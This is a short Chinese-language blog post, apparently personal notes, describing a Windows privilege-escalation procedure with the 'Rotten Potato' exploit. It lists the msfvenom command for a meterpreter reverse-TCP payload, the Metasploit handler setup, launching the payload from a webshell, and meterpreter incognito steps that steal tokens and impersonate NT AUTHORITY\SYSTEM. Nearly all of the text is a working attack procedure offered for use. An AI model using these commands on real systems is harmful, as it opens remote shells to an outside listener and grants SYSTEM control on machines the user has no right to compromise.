邪恶土豆EXP

rp

首先是用msfvenom生成一个msf的反弹shell

command:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=  LPORT= -f exe > shell.exe

然后在msfconsole进行监听

msf > use exploit/multi/handler 
msf > set LHOST ip
msf > set LPORT port
msf > set PAYLOAD windows/meterpreter/reverse_tcp or msf > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf > exploit

然后在菜刀马上执行反弹文件,msf监听回来之后,上传邪恶土豆exp先。

在获得了meterpreter会话之后

先getuid查看当前用户权限


然后使用
use incognito 窃取令牌。

接着是列出当前令牌
list_tokens -u

如果有system令牌直接import。这里讲没有的。
cd到刚才exp的目录地址
getwd查看当前目录地址

然后进行
execute -cH -f ./rp.exe

list_tokens -u 再列出一遍令牌

impersonate_token "NT AUTHORITY\\SYSTEM" 看到system直接使用

反斜线一定要两个
同时 令牌也会跟cookie一样失效,如果失败,再来一次。
imper时候getuid查看一下
然后直接shell进入就行

这里就不解释exp的原理了。其他地方有。
最主要是写给我自己看的 怕忘!

发表评论

电子邮件地址不会被公开。 必填项已用*标注